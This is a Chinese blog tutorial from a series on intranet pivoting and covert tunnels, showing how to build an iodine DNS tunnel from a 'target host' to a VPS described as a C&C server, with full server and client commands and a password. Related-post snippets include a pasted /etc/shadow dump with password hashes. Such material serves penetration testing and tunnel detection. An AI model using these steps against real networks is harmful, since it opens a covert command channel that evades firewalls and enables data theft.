linux查看dns_内网转发及隐蔽隧道 | 应用层隧道技术之使用DNS搭建隧道(iodine)

最新推荐文章于 2023-08-01 16:15:00 发布
最新推荐文章于 2023-08-01 16:15:00 发布
阅读量468 收藏 1
点赞数
文章标签: linux查看dns linux端口转发 linux设置dns windows 端口转发工具 windows 网卡转发 windows端口转发工具
应用层隧道技术之使用DNS搭建隧道(iodine) d74280428d02a7f5ee3494d503ca9f8a.png

目录

    iodine

    使用iodin搭建隧道

        (1):部署域名解析

        (2):安装并启动服务端

        (3):安装并启动客户端

        (4):使用DNS隧道

d74280428d02a7f5ee3494d503ca9f8a.png

➩iodine

iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

与同类工具相比,iodine具有如下特点:

  • 不会对下行数据进行编码

  • 支持多平台(Linux、Windows、MacOS)

  • 支持16个并发连接

  • 支持强密码机制

  • 支持同网段隧道IP地质(不同于服务器一客户端网段)

  • 支持多种DNS记录类型

  • 提供了丰富的隧道质量检测措施

使用iodin搭建隧道

1):部署域名解析

首先,用一台公网的Linux系统的VPS作为C&C服务器,并准备好一个可以配置的域名(这里我们假设是hack.com)。然后,去配置域名的记录。首先创建记录A,将自己的域名 www.hack.com 解析到VPS服务器地址。然后,创建NS记录,将 test.hack.com 指向 www.hack.com 。

  • 第一条A类解析是在告诉域名系统,www.hack.com 的IP地址是 xx.xx.xx.xx 。

  • 第二条NS解析是在告诉域名系统,想要知道 test.hack.com 的IP地址,就去问 www.hack.com 。

1ca362ba42269961f31b896aaca867a4.png

为什么要设置NS类型的记录呢?因为NS类型的记录不是用于设置某个域名的DNS服务器的,而是用于设置某个子域名的DNS服务器的。

如何验证域名解析设置是否成功?
在随便一台电脑上ping域名 www.hack.com ,若能ping通,且显示的IP地址是我们配置的VPS的地址,说明第一条A类解析设置成功并已生效。

a4140e6f6d5c1896c2e7c435817b40b7.png

然后在我们的VPS上执行以下命令监听UDP53端口

tcpdump -n -i eth0 udp dst port 53

在任意一台机器上执行  nslookup test.hack.com 命令,如果在我们的VPS监听的端口有查询信息,说明第二条记录设置成功

555785a794dd72170c605133395d31e4.png

(2):安装并启动服务端

Kali中默认安装了iodine,但是我们这里用的服务端是Centos7系统,可以执行命令:yum -y install iodine 安装。如果是Windows系统,可以安装编译好的对应版本的iodine。

ce0280f4f51cd6a8d6ffeb3cfa76fa61.png

执行以下命令启动服务端

iodined -f -c -P root@123456 192.168.100.1 test.hack.com -DD    -f:在前台运行    -c:禁止检查所有传入请求的客户端IP地址    -P:指定密码    -D:指定调试级别。-DD指第二级,D的数量随等级增加    这里的192.168.10.1是自定义的局域网虚拟IP地址

15f4bdb4dd998f070c155b0bd197163a.png

启动完后,可以通过iodine检查页面:https://code.kryo.se/iodine/check-it/  检查配置是否正确。如下,表示设置成功

93f0d1eca7b28a7d82588c11a8865031.png

服务端启动成功后,VPS上多了一块dns0的网卡,ip为我们设置的192.168.100.1

f64dce3f8da210b15faa0a8803177f4c.png

(3):安装并启动客户端

Windows系统

如果是Windows系统,直接执行下面命令启动客户端,但是启动的过程中,会遇到杀毒软件的报毒,并且需要管理员权限执行命令才可以启动

iodine.exe -f -P root@123456 test.hack.com

715fae01119dc937fc0ec91e657af79f.png

78c629995f3fb1ae9d5e780bd97b6c7a.png

那我们现在就以管理员权限运行该命令,如图,DNS隧道建立成功

d62e7e5ae88b324b34c2ec92b8b1672c.png

查看客户端网卡,多了一张以太网2,IP为192.168.100.2。此时,我们的VPS和客户端处在同一个逻辑的局域网内。

5039252cb4eac2188091db28281dbbee.png

但是此时ping服务端的192.168.100.1地址却ping不通,不知为何,客户端如果是Linux则不会有此情况。

639c5de00a43aedb90c8c5d472c9b9b2.png

Linux系统

如果是Linux系统,先安装iodine。上传iodlie客户端到目标主机,解压,进入目录安装

cd iodine-0.7.0/make && make install

4f51948ec014f5f08c7a99c6266edc0a.png

然后执行下面命令连接服务端(需要root权限),如图连接成功。

iodine -f -P root@123456 test.hack.com

070f2c5e10791522bbcf09d382347ac1.png

连接成功后,客户端上新建了一个dns0的网卡,IP地址为192.168.100.2

8abac047a01424bd853ab9ba9fea6842.png

然后ping服务端地址192.168.100.1,能互通!

dfc28a7bfce9df4d963aee5bcab0d488.png

(4):使用DNS隧道

客户端和服务端连接成功后,由于客户端和服务端处在一个逻辑的局域网中,所以可以直接通。

服务端SSH连接客户端

b90fc68258de985815e309cf05e75369.png

客户端SSH连接服务端

809f01328be36b88e168e60e7d8c1b75.png

其他服务也是一样,可以直接指定虚拟局域网的IP和端口就可连接。

相关文章:

内网转发及隐蔽隧道 | 使用DNS进行命令控制(DNS-Shell)

内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

内网转发及隐蔽隧道 | ICMP隧道(pingTunnel/IcmpTunnel)

内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

内网转发及隐蔽隧道 | 端口转发和端口映射

内网转发及隐蔽隧道 | 内网转发工具的使用

内网转发及隐蔽隧道 | FRP的使用

内网转发及隐蔽隧道 | NPS的使用


责编:vivian

来源:谢公子博客

78f492c7c94b91fe9d69f2433aa7c988.png 如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
weixin_39892481
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DNS隐蔽隧道数据集包括类别dnscat,iodine、tcpoverdnsdns2tcp、dnshell、normal
01-05
DNS隐蔽隧道数据集包括类别cobaltstrike,dnscat,iodine,tcpoverdnsdns2tcp,dnshell,normal 内含原始数据包以及处理后的特征可以直接用于数据的分类。
Linux查看/删除隧道的命令
St.Jimmy的专栏
09-24 6358
*ip tunnel show
配置nginx方向代理,实现URL隐形转发 (附带nginx配置文件详解)
热门推荐
万博的博客
07-31 2万+
配置nginx方向代理,实现URL隐形转发 (附带nginx配置文件详解) 项目名称:【域名解析–隐形URL转发】–centos 7.3 环境: 阿里云服务器之上有多个tomcat; tomcat的站基于ip+端口开发+项目名名称。 要求: 访问二级域名http://wanbo.**.cn/跳转至tomcat的web站,实现隐形URL转发。 方案: nginx代理tomc...
保姆级 DNS 安全隧道中文部署指南
easylife206的专栏
01-01 460
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !一.DNS隧道准备和我哥们在看一个站点的时候,发现是不出的,但是站点可以做DNS查询,所以想着搭建一个DNS隧道。此篇文章为了读者看起来更加清楚,我的公服务器与域名都是未打码的,希望各位大佬手下留情。1.DNS隧道介绍DNS隧道,是隧道技术中的一种。当我们的HTTP、HTTPS这样的上层协议、正反向端口转发都...
隐藏通信隧道技术——DNS隧道
最新发布
A_991128a的博客
08-01 1161
在实际的络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
linux查看dns命令
m0_67392010的博客
08-20 2万+
linux下我们要查看服务器的DNS信息可以通过命令来实现,下面由学习啦小编为大家整理了linux查看dns命令的相关知识,希望对大家有帮助!在上看到还有一些其他方法,查看服务器的DNS配置信息,如下所示,不过这些方法,由于环境限制,我没有验证过,仅供参考。linux查看dns命令2:使用nslookup命令查看DNS信息。linux查看dns命令3:使用dig命令来查看DNS信息。linux查看dns命令4:其它一些方法查看DNS信息。
iodine:一款可快速创建 DNS 隧道的工具 该项目包含 C 语言写的 DNS 隧道服务器和客户端,可快速搭建 DNS 隧道
01-06
iodine:一款可快速创建 DNS 隧道的工具。该项目包含 C 语言写的 DNS 隧道服务器和客户端,可快速搭建 DNS 隧道传输 IPv4 数据,常用于绕过防火墙等场景。因为一般情况下防火墙的 DNS 端口是打开的,所以将流量伪装...
Iodine DNS隧道流量 自用
03-10
Iodine DNS隧道流量 自用
network:包括两个实验:使用Panabit进行DNS劫持,使用iodine建立DNS隧道穿越
04-28
Panabit主要工作在应用层上,采用应用层协议识别的通用技术DPI/DFI。 DPI:深度包检测 DFI:深度流检测 Panabit采用DPI对应用蹭协议特征进行识别判断,并采用独有的“节点跟踪技术+加密协议深度识别引擎”来探测
碘:碘dns隧道的官方git回购
02-21
这可以在防火墙接入Internet但允许DNS查询的不同情况下使用。编译中Iodine没有配置脚本。 如果在/usr/include中找到了相关的头文件,则会自动启用Linux的两个可选功能(SELinux和systemd支持)。 (请参见./src/...
linux命令如何查看dns,详解Linux系统使用dig/nslookup命令查看dns解析的方法
weixin_35725389的博客
04-29 5377
今天主要介绍一下怎么去使用dig/nslookup命令查看dns解析。下面,我们一起来看。一、dig命令Dig是一个在类Unix命令行模式下查询DNS包括NS记录,A记录,MX记录等相关信息的工具。Dig的源码是ISC BIND大包的一部分,但是大多编译和安装Bind的文档都不把它包括在内,但是在linux系统下,它通常是某个包的一部分,在Gentoo下是bind-tools,在Redhat/F...
LinuxDNS域名解析服务
m0_71521555的博客
07-19 2016
LinuxDNS域名解析服务
Linux查看和修改DNS地址
lingyun1987的博客
05-08 3684
命令,nslookup命令是一个络工具,用于查询域名系统(DNS)中的DNS记录。可以使用nslookup命令查看指定域名的IP地址,查看指定IP地址的域名,查看MX记录等。命令查看DNS记录:host命令是一个简单的DNS查询工具,可以用来查询指定域名的IP地址,查看指定IP地址的域名,查看MX记录等。命令,dig命令是一个强大的DNS查询工具,可以用来查询DNS记录,包括A记录、MX记录、NS记录等。修改 /etc/sysconfig/network-scripts/ifcfg-eth0文件。
linux卡的流量怎么通过c语言获取_通过DNS隧道进行通信 iodine
weixin_39574065的博客
11-25 96
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 21 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更iodineiodine 可以通过一台 DNS 服务器制造一个 IPv4 数据通道,特别适合在目标主机只能发送 DNS 请求的络环境使用iodine 是基于 C 语言开发的,分别服务端程序 iodined 和客户端程序 iod...
隐蔽隧道DNS隧道搭建iodine
good good study
05-20 4944
DNS隧道(DNS Tunneling)是将其他协议的内容封装在DNS协议中,然后以DNS请求和响应包完成传输数据(通信)的技术。当前络世界中的DNS是一项必不可少的服务,所以防火墙和入侵检测设备处于可用性和用户友好的考虑将很难做到完全过滤掉DNS流量,因此,攻击者可以利用它实现诸如远程控制,文件传输等操作,众多研究表明DNS Tunneling在僵尸络和APT攻击中扮演着至关重要的角色。iodine
DNS隧道制造工具——iodine
kikaylee的专栏
10-27 3151
odine可以通过一台DNS服务器制造一个IPv4数据通道,这个工具可帮助渗透测试人员用于穿越防火墙等情景。这款工具运行于 Linux, Mac OS X, FreeBSD, NetBSD, OpenBSD和Windows,并需要一个TUN/TAP设备。同时对带宽也有一定要求。 特性: 高性能 跨平台 安全性 安装简单
DNS隧道工具』— iodine
localhost01
01-21 8291
一、入坑必读 1、简介 因为 iodine(碘)的原子序数为53,这恰好是DNS端口号,故取名为iodineiodine基于C语言开发,分为服务端程序 iodined 和客户端程序 iodine,kali系统内置。 服务端程序 iodined 提供特定域名的DNS解析服务。当客户端请求该域名的解析,就可以建立通道连接。 支持EDNS、base32,base64,base128等多种编码规范,更......
DNS隧道工具iodine
大学霸__IT达人
09-28 2121
DNS隧道工具iodine
Kali Linux渗透测试 117 DNS 协议隧道--iodine
kevinhanser
04-08 1255
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 基于 DNS 查询的隧道工具 与同类工具相比的优点对下行数据不进行编码,因此性能优 支持多平台:Linux、BSD、Mac OS、Windows 最大16个并发链接 支持同隧道IP(不同于服务
root:$6$RMpgG8z.$GrGzDK0J1/uXc/Z2WIp6WgIYEB6Bi/Sw2aCc86U2E.BK80mszROf4K1ZB172DOQzgRb6U/2jGPh/8rwXQsbM3/:17277:0:99999:7::: daemon:*:17272:0:99999:7::: bin:*:17272:0:99999:7::: sys:*:17272:0:99999:7::: sync:*:17272:0:99999:7::: games:*:17272:0:99999:7::: man:*:17272:0:99999:7::: lp:*:17272:0:99999:7::: mail:*:17272:0:99999:7::: news:*:17272:0:99999:7::: uucp:*:17272:0:99999:7::: proxy:*:17272:0:99999:7::: www-data:*:17272:0:99999:7::: backup:*:17272:0:99999:7::: list:*:17272:0:99999:7::: irc:*:17272:0:99999:7::: gnats:*:17272:0:99999:7::: nobody:*:17272:0:99999:7::: systemd-timesync:*:17272:0:99999:7::: systemd-network:*:17272:0:99999:7::: systemd-resolve:*:17272:0:99999:7::: systemd-bus-proxy:*:17272:0:99999:7::: _apt:*:17272:0:99999:7::: mysql:!:17272:0:99999:7::: epmd:*:17272:0:99999:7::: Debian-exim:!:17272:0:99999:7::: uuidd:*:17272:0:99999:7::: rwhod:*:17272:0:99999:7::: redsocks:!:17272:0:99999:7::: usbmux:*:17272:0:99999:7::: miredo:*:17272:0:99999:7::: Debian-snmp:!:17272:0:99999:7::: ntp:*:17272:0:99999:7::: stunnel4:!:17272:0:99999:7::: sslh:!:17272:0:99999:7::: rtkit:*:17272:0:99999:7::: postgres:*:17272:0:99999:7::: dnsmasq:*:17272:0:99999:7::: messagebus:*:17272:0:99999:7::: iodine:*:17272:0:99999:7::: arpwatch:!:17272:0:99999:7::: couchdb:*:17272:0:99999:7::: avahi:*:17272:0:99999:7::: sshd:*:17272:0:99999:7::: colord:*:17272:0:99999:7::: saned:*:17272:0:99999:7::: speech-dispatcher:!:17272:0:99999:7::: pulse:*:17272:0:99999:7::: king-phisher:*:17272:0:99999:7::: Debian-gdm:*:17272:0:99999:7::: dradis:*:17272:0:99999:7::: beef-xss:*:17272:0:99999:7::: xrdp:!:17472:0:99999:7::: lightdm:*:17472:0:99999:7::: ctf:$6$d1Y17YhS$P1G.pKFO6VKvKx.y0H7nP5kXAHUAhj6hYroEA.ThT1/kErw37IhVclt.UWCFXrfq/sEZk1jhb52KlPWidJKpp0:17473:0:99999:7:::
07-13
这是一个密码文件(/etc/shadow)的示例。这个文件存储了每个用户的加密密码和其他相关信息。每一行代表一个用户,由多个字段组成,用冒号分隔。字段的含义如下: - 用户名 - 加密后的密码(以 $ 开头) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值